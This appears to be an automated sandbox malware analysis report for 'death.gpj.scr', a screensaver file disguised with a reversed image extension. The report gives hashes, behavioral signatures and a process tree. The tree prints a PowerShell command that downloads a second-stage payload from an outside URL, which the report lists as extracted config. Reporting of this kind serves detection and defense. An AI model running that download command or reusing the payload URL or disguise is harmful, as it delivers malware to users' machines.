Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
04-09-2024 12:45
Static task
static1
Behavioral task
behavioral1
Sample
private server/death.gpj.scr
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
private server/death.gpj.scr
Resource
win10v2004-20240802-en
General
-
Target
private server/death.gpj.scr
-
Size
466KB
-
MD5
0fdbc8c24e84eea10dc25e81765014a1
-
SHA1
2d566a2b94fc8b16b97200392db1bbe714c31289
-
SHA256
e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58
-
SHA512
3cb0c09cc5303f7842fd5ba79a118f62586c4f494a2168c6103db55697fe9dc063f866ec5ee8fc208e01cfe7d7e6b044847c824ee28ed7b4ba41d035fb7da72f
-
SSDEEP
12288:CgZXEAO/BUdG3gVdt7Kdm5bakhM/7xah42prW1:CgZXoZUTVdt7K0JakhM1ah42prW1
Malware Config
Extracted
https://master-repogen.vercel.app/file/server.scr
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 5 2668 powershell.exe 6 2668 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exepowershell.exedeath.gpj.scrDllHost.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language death.gpj.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
DllHost.exepid Process 2592 DllHost.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
death.gpj.scrcmd.exedescription pid Process procid_target PID 2220 wrote to memory of 2924 2220 death.gpj.scr 31 PID 2220 wrote to memory of 2924 2220 death.gpj.scr 31 PID 2220 wrote to memory of 2924 2220 death.gpj.scr 31 PID 2220 wrote to memory of 2924 2220 death.gpj.scr 31 PID 2924 wrote to memory of 2668 2924 cmd.exe 33 PID 2924 wrote to memory of 2668 2924 cmd.exe 33 PID 2924 wrote to memory of 2668 2924 cmd.exe 33 PID 2924 wrote to memory of 2668 2924 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\private server\death.gpj.scr"C:\Users\Admin\AppData\Local\Temp\private server\death.gpj.scr" /S1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\private server\Dropper.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://master-repogen.vercel.app/file/server.scr', 'C:\Users\Admin\Downloads\server.scr')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2592
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
470B
MD58073ff57f855d5cd51346f011933d9fb
SHA1d24fc282fb660945b87e1c41860a031f6e7ec9f6
SHA2566bce98ce8751d6f87e97578a05e606a0b699f24c1a69b96cd28ef88d4984fe71
SHA5129f2e04c4f8bdeab0e2075b5bc42edbe6a9ee4221fbf1ebbacd44238576e77f7b2d5f5d3ac90d433b8b6f5493fef51747405e14a5aa2cf59a4663b2cf385b4610
-
Filesize
90KB
MD55d8d4ee19e74d88a0f24aa241dddb14f
SHA10172899ae844f7eba49c323c1d0d85c5888ca4d8
SHA256598dc794a9b904fbc5f528e1ff290a54323f3598a15d063b31d48c06f71fa58f
SHA512b863b5ae92bcf901d0fe6b9d188d65e4824acfcb3c32ba9e4e6e85727fe232df43241bed4b89698e751508f2e6b23481f6e411d8e8e88d08bfac452e01ff9d96